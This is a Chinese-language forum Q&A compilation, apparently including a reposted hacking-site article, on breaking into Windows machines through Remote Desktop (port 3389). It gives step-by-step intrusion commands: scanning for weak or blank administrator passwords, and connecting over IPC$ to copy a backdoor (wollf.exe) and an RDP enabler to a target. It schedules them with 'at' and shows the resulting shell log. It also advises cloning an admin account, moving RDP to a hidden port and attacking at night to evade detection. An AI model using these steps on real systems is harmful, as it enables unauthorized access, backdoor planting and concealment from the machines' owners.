3389登陆器3389端口入侵怎么操作

开启3389的命令是多少？

REG query HKLMSYSTEMCurrentControlSetControlTerminal" "ServerWinStationsRDP-Tcp /v PortNumber 这条命令是查看远程桌面连接所开的端口是多少 一般默认显示是0xd3d 也就是3389 。

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 这条是开启3389的命令 xp和2003可以使用。

开3389的工具也有！！！呵呵 祝你好运！

远程登陆3389

对方如果是XP的机器 除非对方睡觉挂机!要不然你登录进去的话 会把当前用户注销掉 以你XP默认不支持3389连接 如果你远程连接 对方就会注销了! 如果对方是2003服务器 也就没问题了!知道了对方的管理员帐号和密码 可以进去克隆一个管理员!这样就算登录了!对方也察觉不到的! 如果方便的话 你可以来3389我一下 试试!我XP 2003 LINUX 系统你都可以来尝试!

3389登录器为什么最近都突然不好用了？

我使用3389的时候没有发现有什么不一样! 你是登录网吧?还是从网吧登录? 你说的不是很清楚!只能大概分析一下! 登录的时候能连接上服务器吗? 卡到那一步了?? 使用自带登陆器,还是第三方的登陆器? 服务器是否使用了端口映射? 服务器端口开放情况? 你说的pubwin好像是个网吧管理软件吧! 抱歉没有接触过,无法给什么建议!

怎么在dos命令上开启3389

第一种方法： 使用的工具: 1:ipcscan扫描器 2:终端服务连接工具xpts.exe(WIN 2000/XP 终端连接程序. 内附有COPY 文件的补丁. 格式 IP:Port ) 3:开终端的脚本rots.vbs(灰色轨迹zzzevazzz的作品) 4:cscript (在system32文件夹下;98操作系统可能没有 二:步骤: 1:用ipcscan扫描弱口令(你们可以自己扫,我也扫到一些弱口令主机.演实时间我在论坛上再发) 2:用rots.vbs开启终端服务 说明 cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项] 格式 cscript.exe rots.vbs ip user userpass port /r 或者 cscript.exe rots.vbs ip user userpass port /fr 三:常见问题: 1:脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。

因为pro版不能安装终端服务.如果你确信脚本判断错误,就继续安装好了. 2:可能会出现:ing 202.202.202.202 ....Error0x80070776 .Error description: 没有发现指定的此对象导出者,这个还是放弃吧. 3:可能会连接不上,请用这个格式127.0.0.1:1818 1818是刚才开的端口.第二种方法： 进入后：TELNET上去！ c:>echo [Components] > c: ock c:>echo TSEnable = on >> c: ock c:>sysocmgr /i:c:winntinfsysoc.inf /u:c: ock /q 或者！ c:>echo [Components] > d:wawa c:>echo TSEnable = on >> d:wawa c:>sysocmgr /i:c:winntinfsysoc.inf /u:d:wawa /q 等会自动启后就OK 或者： 在本地利用dos命令edit建立.bat后缀批处理文件（文件名随意） echo [Components] > c:sql echo TSEnable = on >> c:sqlsysocmgr /i:c:winntinfsysoc.inf /u:c:sql /q net use \ip地址ipc$ 密码 /user:用户名（一般默认:administrator) 利用at time 获取对方服务器时间。

copy 路径:xxx.bat \ip地址$c:winnt at time 00:00:00 xxx.bat 服务器执行命令后，服务器将重新启动，利用3389登陆就OK了！第三种方法： 进入后,再次检查终端组件是否安装: c:>query user 这个工具需要安装终端服务. 这样就进一步确定了组件没有被安装.如果返回: USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME >w1 console 0 运行中 . 2002-1-12 22:5 \类似这样的信息,可能组件就已安装. 好!都清楚了,可以开始安装了. --------------------------------------------------- C:>dir c:sysoc.inf /s //检查INF文件的位置 c:WINNTinf 的目录 2000-01-10 20:00 3,770 sysoc.inf 1 个文件 3,770 字节 ----------------------------------------------------- C:> dir c:sysocmgr.* /s //检查组件安装程序 c:WINNTsystem32 的目录 2000-01-10 20:00 42,768 sysocmgr.exe 1 个文件 42,768 字节 ----------------------------------------------------- c:>echo [Components] > c: ock c:>echo TSEnable = on >> c: ock //这是建立无人参与的安装参数 c:>type c: ock [Components] TSEnable = on //检查参数文件 ------------------------------------------------------ c:>sysocmgr /i:c:winntinfsysoc.inf /u:c: ock /q ----------------------------------------------------- 这一条就是真正安装组件的命令. 以上这条命令没有加/R参数,主机在安装完后自动重起. 如若加了/R参数主机就不会重起. 如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时, 3389终端服务就已经开启.你就可以连上去了. 问题和建议: A 在安装过程中,不使用/R,有时主机也不会重起,你就要手动重起他,但在使用诸如:iisreset /reboot命令时,对方 的屏幕会出现个对话框,写着谁引起的这次启动,离重起还有多少秒. B 一次不行可以再试一次,在实际中很有作用. C 在输入sysocmgr命令开始安装时,一定不要把命令参数输错,那会在对方出现一个大的对话框,是sysocmgr的帮助,很是显眼, 而且要求确定.在你的屏幕上是不会有任何反应的,你不会知道出错，所以会有B的建议. 第四种方法： C:Documents and Settingsshanlu.XZGJDOMAIN& use \218.22.155.*ipc$ "" /us er:administrator----------------连接成功！ 命令成功完成。

C:Documents and Settingsshanlu.XZGJDOMAIN>copy wollf.exe \218.22.155.*admi n$------------------------------拷贝wollf.exe到目标计算机的admin$目录 已复制 1 个文件。

C:Documents and Settingsshanlu.XZGJDOMAIN>copy hbulot.exe \218.22.155.*adm in$-----------------------------拷贝hbulot.exe到目标计算机的admin$目录 已复制 1 个文件。

C:Documents and Settingsshanlu.XZGJDOMAIN& time \218.22.155.* \218.22.155.* 的当前时间是 2002/12/1 上午 06:37 命令成功完成。

C:Documents and Settingsshanlu.XZGJDOMAIN>at \218.22.155.* 06:39 wollf.exe 新加了一项作业，其作业 ID = 1--指定wollf.exe在06:39运行 ------------------------------------------------------------------------------------------ 说明： wollf.exe是一个后门程序，很多高手都喜欢nc或者winshell，不过我对他情有独钟！在这里我只介绍与本文内 容有关的命令参数，它的高级用法不做补充。

hbulot.exe是用于开启3389服务，如果不是server及以上版本，就不要运行了。

因为pro版不能安装终端服务。

2分钟后...... ------------------------------------------------------------------------------------------ C:Documents and Settingsshanlu.XZGJDOMAIN>wollf -connect 218.22.155.* 7614 "Wollf Remote Manager" v1.6 Code by wollf, ------------------------------------------------------------------------------------------ 说明： 使用wollf连接时要注意wollf.exe要在当前目录，它的连接命令格式：wollf -connect IP 7614 7614是wollf开放的端口。

如果显示如上，说明你已经连接成功，并具有管理员administrator权限。

------------------------------------------------------------------------------------------ [server@D:WINNTsystem32]#dos Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 Microsoft Corp. ------------------------------------------------------------------------------------------ 说明： 输入dos,你就会进入目标机的cmd下，这时同样具有administrator权限。

------------------------------------------------------------------------------------------ D:WINNTsystem32>cd.. cd.. D:WINNT>dir h*.* dir h*.* 驱动器 D 中的卷没有标签。

卷的序列号是 1CE5-2615 D:WINNT 的目录 2002-11-27 03:07 <DIR> Help 2002-09-10 12:16 10,752 hh.exe 2002-10-01 08:29 24,576 HBULOT.exe 2 个文件 35,328 字节 1 个目录 9,049,604,096 可用字节 D:WINNT>hbulot hbulot ------------------------------------------------------------------------------------------ 说明： 因为我们把HBULOT.exe放到目标机的admin$下的，所以先找到它，以上是文件的存放位置。

D:WINNT>exit exit Command "dos" eed. [server@D:WINNTsystem32]#reboot Command "REBOOT" eed. [server@D:WINNTsystem32]# Connection closed. ------------------------------------------------------------------------------------------ 说明： 由dos退到wollf的连接模式下用exit命令，HBULOT.exe运行后需重新启动方可生效，这里wollf自带的REBOOT 命令，执行过在5秒后你就会失去连接。

启动完毕后检查一下3389端口是否开放，方法很多，superscan3扫一下 。

这时候你就可以登陆了。

如果没有开放3389那就不是server及以上版本，就不要运行了。

因为pro版不能安装终端服务。

到这里，你已经拥有3389肉鸡了！但是会不会被别的入侵者发现呢？下面所教的就是怎么让3389只为你服务！ 我们现在使用的3389登陆器有两种版本，一种是2000/98，一种是XP。

二者区别呢？前者使用的默认端口3389对 目标，后者默认的也是3389端口，但是它还支持别的端口进行连接！所以呢......我们来修改3389的连接端口 来躲过普通扫描器的扫描！修改方法如下： 修改服务器端的端口设置 ，注册表有2个地方需要修改。

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWds dpwdTds cp] PortNumber值，默认是3389，修改成所希望的端口，比如1314 第二个地方： [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp]　 PortNumber值，默认是3389，修改成所希望的端口，比如1314 现在这样就可以了。

重启系统吧。

注意：事实上，只修改第二处也是可以的。

另外，第二处的标准联结应该是 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStations<connection> <connection>表示具体的某个RDP-TCP连结。

重启过后，看看端口有没有改。

小技巧：修改注册表键值时，先选择10进制，输入你希望的端口数值，再选择16进制，系统会自动转换。

本篇文章来源于 新世纪网安基地 () 原文出处： /Article/Text2/dos/200807/10761.html

3389端口入侵怎么操作

首先用扫描工具扫描开放3389的电脑，然后再启动远程桌面连接，一般账户名是ADMINISTRATOR,或者GUEST密码为空。

选择深夜入侵不容易被发现，否则对方依然会发现你的一举一动。